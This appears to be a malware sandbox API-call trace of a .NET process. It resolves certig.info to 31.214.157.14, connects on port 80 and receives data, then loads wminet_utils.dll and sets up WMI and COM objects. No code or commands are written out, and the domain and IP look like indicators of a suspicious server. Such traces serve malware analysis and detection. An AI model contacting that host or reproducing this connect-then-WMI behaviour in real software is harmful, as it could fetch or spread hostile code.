	[0154.262] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2e9f540, cbSid=0x1c68c850 | out: pSid=0x2e9f540*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c850) returned 1
	[0154.263] CreateMutexW (lpMutexAttributes=0x2e9f6f8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0154.263] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ea0360, cbSid=0x1c68c850 | out: pSid=0x2ea0360*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c850) returned 1
	[0154.263] CreateMutexW (lpMutexAttributes=0x2ea0518, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3d4
	[0154.265] CoTaskMemAlloc (cb=0xd) returned 0x1b85b7c0
	[0154.267] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x1c68cd40*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c68cd38 | out: ppResult=0x1c68cd38*=0x1b862330*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x1b85bb00*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0154.410] CoTaskMemFree (pv=0x1b85b7c0) 
	[0154.410] CoTaskMemFree (pv=0x0) 
	[0154.412] FreeAddrInfoW (pAddrInfo=0x1b862330*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o.info", ai_addr=0x1b85bb00*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0154.412] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x408
	[0154.413] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x410
	[0154.415] WSAConnect (in: s=0x408, name=0x2ea10e0*(sa_family=2, sin_port=0x50, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0154.442] closesocket (s=0x410) returned 0
	[0155.142] CoTaskMemAlloc (cb=0x104) returned 0x240010
	[0155.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x240010, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0155.191] CoTaskMemFree (pv=0x240010) 
	[0156.964] recv (in: s=0x408, buf=0x2efd9a8, len=502, flags=0 | out: buf=0x2efd9a8*) returned 326
	[0158.415] CoTaskMemAlloc (cb=0x104) returned 0x240010
	[0158.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x240010, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.416] CoTaskMemFree (pv=0x240010) 
	[0158.562] VirtualQuery (in: lpAddress=0x1c68c8a0, lpBuffer=0x1c68d760, dwLength=0x30 | out: lpBuffer=0x1c68d760*(BaseAddress=0x1c68c000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0158.638] CoTaskMemAlloc (cb=0x104) returned 0x240010
	[0158.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x240010, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.638] CoTaskMemFree (pv=0x240010) 
	[0158.682] CoTaskMemAlloc (cb=0x104) returned 0x240010
	[0158.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x240010, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.682] CoTaskMemFree (pv=0x240010) 
	[0158.910] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1d8
	[0158.914] CoGetObjectContext (in: riid=0x1c68cbb8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cbb0 | out: ppv=0x1c68cbb0*=0x221868) returned 0x0
	[0158.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c68b6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0158.960] CoTaskMemAlloc (cb=0x43) returned 0x1b865ad0
	[0158.960] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\\\wminet_utils.dll") returned 0x642ffff0000
	[0159.548] CoTaskMemFree (pv=0x1b865ad0) 
	[0159.549] CoTaskMemAlloc (cb=0xf) returned 0x1b8690a0
	[0159.549] GetProcAddress (hModule=0x642ffff0000, lpProcName="ResetSecurity") returned 0x642ffff20e0
	[0159.549] CoTaskMemFree (pv=0x1b8690a0) 
	[0159.688] CoTaskMemAlloc (cb=0xd) returned 0x1b8690a0
	[0159.689] GetProcAddress (hModule=0x642ffff0000, lpProcName="SetSecurity") returned 0x642ffff21b0
	[0159.689] CoTaskMemFree (pv=0x1b8690a0) 
	[0160.108] CoTaskMemAlloc (cb=0x14) returned 0x1b8690a0
	[0160.109] GetProcAddress (hModule=0x642ffff0000, lpProcName="BlessIWbemServices") returned 0x642ffff2290
	[0160.109] CoTaskMemFree (pv=0x1b8690a0) 
	[0160.835] CoTaskMemAlloc (cb=0x1a) returned 0x1b864c10
	[0160.835] GetProcAddress (hModule=0x642ffff0000, lpProcName="BlessIWbemServicesObject") returned 0x642ffff23b0
	[0160.836] CoTaskMemFree (pv=0x1b864c10) 
	[0161.097] CoTaskMemAlloc (cb=0x13) returned 0x1b8690a0
	[0161.097] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetPropertyHandle") returned 0x642ffff24d0
	[0161.097] CoTaskMemFree (pv=0x1b8690a0) 
	[0161.370] CoTaskMemAlloc (cb=0x14) returned 0x1b8690a0
	[0161.370] GetProcAddress (hModule=0x642ffff0000, lpProcName="WritePropertyValue") returned 0x642ffff2500
	[0161.370] CoTaskMemFree (pv=0x1b8690a0) 
	[0161.612] CoTaskMemAlloc (cb=0x7) returned 0x1b860ce0
	[0161.613] GetProcAddress (hModule=0x642ffff0000, lpProcName="Clone") returned 0x642ffff2530
	[0161.613] CoTaskMemFree (pv=0x1b860ce0) 
	[0161.905] CoTaskMemAlloc (cb=0x11) returned 0x1b8690e0
	[0161.906] GetProcAddress (hModule=0x642ffff0000, lpProcName="VerifyClientKey") returned 0x642ffff31f0
	[0161.906] CoTaskMemFree (pv=0x1b8690e0) 
	[0161.921] CoTaskMemAlloc (cb=0x11) returned 0x1b8690e0
	[0161.921] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetQualifierSet") returned 0x642ffff2a50
	[0161.921] CoTaskMemFree (pv=0x1b8690e0) 
	[0162.161] CoTaskMemAlloc (cb=0x5) returned 0x1b860ce0
	[0162.162] GetProcAddress (hModule=0x642ffff0000, lpProcName="Get") returned 0x642ffff2700
	[0162.162] CoTaskMemFree (pv=0x1b860ce0) 
	[0162.441] CoTaskMemAlloc (cb=0x5) returned 0x1b860ce0
	[0162.442] GetProcAddress (hModule=0x642ffff0000, lpProcName="Put") returned 0x642ffff26c0
	[0162.442] CoTaskMemFree (pv=0x1b860ce0) 
	[0162.650] CoTaskMemAlloc (cb=0x8) returned 0x1b860ce0
	[0162.650] GetProcAddress (hModule=0x642ffff0000, lpProcName="Delete") returned 0x642ffff2750
	[0162.650] CoTaskMemFree (pv=0x1b860ce0) 
	[0162.784] CoTaskMemAlloc (cb=0xa) returned 0x1b8690e0
	[0162.784] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetNames") returned 0x642ffff2760
	[0162.784] CoTaskMemFree (pv=0x1b8690e0) 
	[0163.121] CoTaskMemAlloc (cb=0x12) returned 0x1b8690e0
	[0163.121] GetProcAddress (hModule=0x642ffff0000, lpProcName="BeginEnumeration") returned 0x642ffff27b0
	[0163.121] CoTaskMemFree (pv=0x1b8690e0) 
	[0163.144] CoTaskMemAlloc (cb=0x6) returned 0x1b860ce0
	[0163.144] GetProcAddress (hModule=0x642ffff0000, lpProcName="Next") returned 0x642ffff27c0
	[0163.144] CoTaskMemFree (pv=0x1b860ce0) 
	[0163.413] CoTaskMemAlloc (cb=0x10) returned 0x1b8690e0
	[0163.413] GetProcAddress (hModule=0x642ffff0000, lpProcName="EndEnumeration") returned 0x642ffff2810
	[0163.413] CoTaskMemFree (pv=0x1b8690e0) 
	[0163.529] CoTaskMemAlloc (cb=0x19) returned 0x1b864910
	[0163.529] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetPropertyQualifierSet") returned 0x642ffff2820
	[0163.529] CoTaskMemFree (pv=0x1b864910) 
	[0163.661] CoTaskMemAlloc (cb=0x7) returned 0x1b860ce0
	[0163.662] GetProcAddress (hModule=0x642ffff0000, lpProcName="Clone") returned 0x642ffff2530
	[0163.662] CoTaskMemFree (pv=0x1b860ce0) 
	[0163.662] CoTaskMemAlloc (cb=0xf) returned 0x1b8690a0
	[0163.662] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetObjectText") returned 0x642ffff2840
	[0163.662] CoTaskMemFree (pv=0x1b8690a0) 
	[0163.811] CoTaskMemAlloc (cb=0x13) returned 0x1b8690e0
	[0163.811] GetProcAddress (hModule=0x642ffff0000, lpProcName="SpawnDerivedClass") returned 0x642ffff2860
	[0163.811] CoTaskMemFree (pv=0x1b8690e0) 
	[0163.838] CoTaskMemAlloc (cb=0xf) returned 0x1b8690a0
	[0163.838] GetProcAddress (hModule=0x642ffff0000, lpProcName="SpawnInstance") returned 0x642ffff2880
	[0163.838] CoTaskMemFree (pv=0x1b8690a0) 
	[0164.037] CoTaskMemAlloc (cb=0xb) returned 0x1b8690e0
	[0164.037] GetProcAddress (hModule=0x642ffff0000, lpProcName="CompareTo") returned 0x642ffff28a0
	[0164.037] CoTaskMemFree (pv=0x1b8690e0) 
	[0164.061] CoTaskMemAlloc (cb=0x13) returned 0x1b8690e0
	[0164.061] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetPropertyOrigin") returned 0x642ffff28c0
	[0164.061] CoTaskMemFree (pv=0x1b8690e0) 
	[0164.509] CoTaskMemAlloc (cb=0xe) returned 0x1b8690e0
	[0164.510] GetProcAddress (hModule=0x642ffff0000, lpProcName="InheritsFrom") returned 0x642ffff28e0
	[0164.510] CoTaskMemFree (pv=0x1b8690e0) 
	[0164.691] CoTaskMemAlloc (cb=0xb) returned 0x1b8690e0
	[0164.692] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetMethod") returned 0x642ffff28f0
	[0164.692] CoTaskMemFree (pv=0x1b8690e0) 
	[0164.867] CoTaskMemAlloc (cb=0xb) returned 0x1b8690e0
	[0164.867] GetProcAddress (hModule=0x642ffff0000, lpProcName="PutMethod") returned 0x642ffff2940
	[0164.867] CoTaskMemFree (pv=0x1b8690e0) 
	[0165.098] CoTaskMemAlloc (cb=0xe) returned 0x1b8690e0
	[0165.099] GetProcAddress (hModule=0x642ffff0000, lpProcName="DeleteMethod") returned 0x642ffff2990
	[0165.099] CoTaskMemFree (pv=0x1b8690e0) 
	[0165.348] CoTaskMemAlloc (cb=0x18) returned 0x1b8690e0
	[0165.349] GetProcAddress (hModule=0x642ffff0000, lpProcName="BeginMethodEnumeration") returned 0x642ffff29a0
	[0165.349] CoTaskMemFree (pv=0x1b8690e0) 
	[0165.373] CoTaskMemAlloc (cb=0xc) returned 0x1b8690e0
	[0165.374] GetProcAddress (hModule=0x642ffff0000, lpProcName="NextMethod") returned 0x642ffff29b0
	[0165.374] CoTaskMemFree (pv=0x1b8690e0) 
	[0165.693] CoTaskMemAlloc (cb=0x16) returned 0x1b8690e0
	[0165.694] GetProcAddress (hModule=0x642ffff0000, lpProcName="EndMethodEnumeration") returned 0x642ffff2a00
	[0165.694] CoTaskMemFree (pv=0x1b8690e0) 
	[0165.696] CoTaskMemAlloc (cb=0x17) returned 0x1b8690e0
	[0165.696] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetMethodQualifierSet") returned 0x642ffff2a10
	[0165.696] CoTaskMemFree (pv=0x1b8690e0) 
	[0166.000] CoTaskMemAlloc (cb=0x11) returned 0x1b8690a0
	[0166.001] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetMethodOrigin") returned 0x642ffff2a30
	[0166.001] CoTaskMemFree (pv=0x1b8690a0) 
	[0166.185] CoTaskMemAlloc (cb=0x12) returned 0x1b8690a0
	[0166.186] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Get") returned 0x642ffff2a60
	[0166.186] CoTaskMemFree (pv=0x1b8690a0) 
	[0166.540] CoTaskMemAlloc (cb=0x12) returned 0x1b8690a0
	[0166.540] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Put") returned 0x642ffff2ab0
	[0166.540] CoTaskMemFree (pv=0x1b8690a0) 
	[0166.692] CoTaskMemAlloc (cb=0x15) returned 0x1b8690a0
	[0166.692] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Delete") returned 0x642ffff2ae0
	[0166.693] CoTaskMemFree (pv=0x1b8690a0) 
	[0166.875] CoTaskMemAlloc (cb=0x17) returned 0x1b8690a0
	[0166.875] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_GetNames") returned 0x642ffff2af0
	[0166.876] CoTaskMemFree (pv=0x1b8690a0) 
	[0166.910] CoTaskMemAlloc (cb=0x1f) returned 0x1b8648b0
	[0166.910] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_BeginEnumeration") returned 0x642ffff2b10
	[0166.910] CoTaskMemFree (pv=0x1b8648b0) 
	[0167.199] CoTaskMemAlloc (cb=0x13) returned 0x1b8690a0
	[0167.200] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Next") returned 0x642ffff2b20
	[0167.200] CoTaskMemFree (pv=0x1b8690a0) 
	[0167.354] CoTaskMemAlloc (cb=0x1d) returned 0x1b864a60
	[0167.355] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_EndEnumeration") returned 0x642ffff2b70
	[0167.355] CoTaskMemFree (pv=0x1b864a60) 
	[0167.357] CoTaskMemAlloc (cb=0x19) returned 0x1b864a90
	[0167.357] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetCurrentApartmentType") returned 0x642ffff2a50
	[0167.357] CoTaskMemFree (pv=0x1b864a90) 
	[0167.474] CoTaskMemAlloc (cb=0x16) returned 0x1b8690a0
	[0167.474] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetDemultiplexedStub") returned 0x642ffff2060
	[0167.474] CoTaskMemFree (pv=0x1b8690a0) 
	[0167.619] CoTaskMemAlloc (cb=0x17) returned 0x1b8690a0
	[0167.619] GetProcAddress (hModule=0x642ffff0000, lpProcName="CreateInstanceEnumWmi") returned 0x642ffff1760
	[0167.619] CoTaskMemFree (pv=0x1b8690a0) 
	[0167.956] CoTaskMemAlloc (cb=0x14) returned 0x1b8690a0
	[0167.956] GetProcAddress (hModule=0x642ffff0000, lpProcName="CreateClassEnumWmi") returned 0x642ffff18c0
	[0167.956] CoTaskMemFree (pv=0x1b8690a0) 
	[0168.135] CoTaskMemAlloc (cb=0xe) returned 0x1b8690a0
	[0168.135] GetProcAddress (hModule=0x642ffff0000, lpProcName="ExecQueryWmi") returned 0x642ffff1a20
	[0168.135] CoTaskMemFree (pv=0x1b8690a0) 
	[0168.731] CoTaskMemAlloc (cb=0x1a) returned 0x1b864d00
	[0168.732] GetProcAddress (hModule=0x642ffff0000, lpProcName="ExecNotificationQueryWmi") returned 0x642ffff1b90
	[0168.732] CoTaskMemFree (pv=0x1b864d00) 
	[0169.079] CoTaskMemAlloc (cb=0x10) returned 0x1b8690a0
	[0169.080] GetProcAddress (hModule=0x642ffff0000, lpProcName="PutInstanceWmi") returned 0x642ffff1d00
	[0169.080] CoTaskMemFree (pv=0x1b8690a0) 
	[0169.631] CoTaskMemAlloc (cb=0xd) returned 0x1b8690a0
	[0169.631] GetProcAddress (hModule=0x642ffff0000, lpProcName="PutClassWmi") returned 0x642ffff1e00
	[0169.631] CoTaskMemFree (pv=0x1b8690a0) 
	[0170.209] CoTaskMemAlloc (cb=0x1a) returned 0x1b864a30
	[0170.210] GetProcAddress (hModule=0x642ffff0000, lpProcName="CloneEnumWbemClassObject") returned 0x642ffff1f00
	[0170.210] CoTaskMemFree (pv=0x1b864a30) 
	[0170.628] CoTaskMemAlloc (cb=0x12) returned 0x1b8690a0
	[0170.628] GetProcAddress (hModule=0x642ffff0000, lpProcName="ConnectServerWmi") returned 0x642ffff34c0
	[0170.628] CoTaskMemFree (pv=0x1b8690a0) 
	[0171.116] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cbd0 | out: pAptType=0x1c68cbd0*=1) returned 0x0
	[0171.116] IUnknown:QueryInterface (in: This=0x221868, riid=0x2fcf310*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68ccd8 | out: ppvObject=0x1c68ccd8*=0x0) returned 0x80004002
	[0171.117] IUnknown:Release (This=0x221868) returned 0x0
	[0172.087] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x1c68c3d0 | out: lpiid=0x1c68c3d0) returned 0x0
	[0172.087] CoGetClassObject (in: rclsid=0x2756a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c240 | out: ppv=0x1c68c240*=0x1cc21370) returned 0x0
	[0172.107] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc21370, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bf50 | out: ppvObject=0x1c68bf50*=0x0) returned 0x80004002
	[0172.107] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cc21370, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bf38 | out: ppvObject=0x1c68bf38*=0x1cc21390) returned 0x0
	[0172.108] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc21390, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68be40 | out: ppvObject=0x1c68be40*=0x1cc21390) returned 0x0
	[0172.113] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc21390, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68bec0 | out: ppvObject=0x1c68bec0*=0x0) returned 0x80004002
	[0172.122] WbemDefPath:IUnknown:AddRef (This=0x1cc21390) returned 0x3
	[0172.123] CoGetContextToken (in: pToken=0x1c68bb10 | out: pToken=0x1c68bb10) returned 0x0
	[0172.123] CoGetObjectContext (in: riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1b865b88 | out: ppv=0x1b865b88*=0x221850) returned 0x0
	[0172.123] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc21390, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bad0 | out: ppvObject=0x1c68bad0*=0x1b869100) returned 0x0
	[0172.124] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b869100, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bb00 | out: pCid=0x1c68bb00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0172.124] WbemDefPath:IUnknown:Release (This=0x1b869100) returned 0x3
	[0172.156] CoGetContextToken (in: pToken=0x1c68bae0 | out: pToken=0x1c68bae0) returned 0x0
	[0172.156] WbemDefPath:IUnknown:AddRef (This=0x1cc21390) returned 0x4
	[0172.156] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc21390, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bbf8 | out: ppvObject=0x1c68bbf8*=0x0) returned 0x80004002
	[0172.157] WbemDefPath:IUnknown:Release (This=0x1cc21390) returned 0x3
	[0172.157] WbemDefPath:IUnknown:Release (This=0x1cc21390) returned 0x2
	[0172.157] WbemDefPath:IUnknown:Release (This=0x1cc21370) returned 0x0
	[0172.157] WbemDefPath:IUnknown:Release (This=0x1cc21390) returned 0x1
	[0172.159] CoGetContextToken (in: pToken=0x1c68c810 | out: pToken=0x1c68c810) returned 0x0
	[0172.159] CoGetContextToken (in: pToken=0x1c68c750 | out: pToken=0x1c68c750) returned 0x0
	[0172.159] WbemDefPath:IUnknown:AddRef (This=0x1cc21390) returned 0x2
	[0172.159] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc21390, riid=0x1c68c890*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c870 | out: ppvObject=0x1c68c870*=0x1cc21390) returned 0x0
	[0172.159] WbemDefPath:IUnknown:Release (This=0x1cc21390) returned 0x2
	[0172.159] WbemDefPath:IUnknown:Release (This=0x1cc21390) returned 0x1
	[0172.160] CoGetObjectContext (in: riid=0x1c68bb38*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68bb30 | out: ppv=0x1c68bb30*=0x221868) returned 0x0
	[0172.160] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68bb50 | out: pAptType=0x1c68bb50*=1) returned 0x0
	[0172.160] IUnknown:QueryInterface (in: This=0x221868, riid=0x2fcf310*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68bc58 | out: ppvObject=0x1c68bc58*=0x0) returned 0x80004002
	[0172.161] IUnknown:Release (This=0x221868) returned 0x1
	[0172.161] CoGetClassObject (in: rclsid=0x2756a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68b1c0 | out: ppv=0x1c68b1c0*=0x1cc21370) returned 0x0
	[0172.162] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc21370, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68aed0 | out: ppvObject=0x1c68aed0*=0x0) returned 0x80004002
	[0172.162] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cc21370, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68aeb8 | out: ppvObject=0x1c68aeb8*=0x1cc21490) returned 0x0
	[0172.162] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc21490, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68adc0 | out: ppvObject=0x1c68adc0*=0x1cc21490) returned 0x0
	[0172.162] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc21490, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68ae40 | out: ppvObject=0x1c68ae40*=0x0) returned 0x80004002
	[0172.163] WbemDefPath:IUnknown:AddRef (This=0x1cc21490) returned 0x3
	[0172.163] CoGetContextToken (in: pToken=0x1c68aa90 | out: pToken=0x1c68aa90) returned 0x0
	[0172.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc21490, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68aa50 | out: ppvObject=0x1c68aa50*=0x1b869140) returned 0x0
	[0172.163] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b869140, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68aa80 | out: pCid=0x1c68aa80*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0172.163] WbemDefPath:IUnknown:Release (This=0x1b869140) returned 0x3
	[0172.163] CoGetContextToken (in: pToken=0x1c68aa60 | out: pToken=0x1c68aa60) returned 0x0
	[0172.163] WbemDefPath:IUnknown:AddRef (This=0x1cc21490) returned 0x4
	[0172.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc21490, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68ab78 | out: ppvObject=0x1c68ab78*=0x0) returned 0x80004002
	[0172.164] WbemDefPath:IUnknown:Release (This=0x1cc21490) returned 0x3
	[0172.164] WbemDefPath:IUnknown:Release (This=0x1cc21490) returned 0x2
	[0172.164] WbemDefPath:IUnknown:Release (This=0x1cc21370) returned 0x0
	[0172.164] WbemDefPath:IUnknown:Release (This=0x1cc21490) returned 0x1
	[0172.164] CoGetContextToken (in: pToken=0x1c68b790 | out: pToken=0x1c68b790) returned 0x0
	[0172.164] CoGetContextToken (in: pToken=0x1c68b6d0 | out: pToken=0x1c68b6d0) returned 0x0
	[0172.164] WbemDefPath:IUnknown:AddRef (This=0x1cc21490) returned 0x2
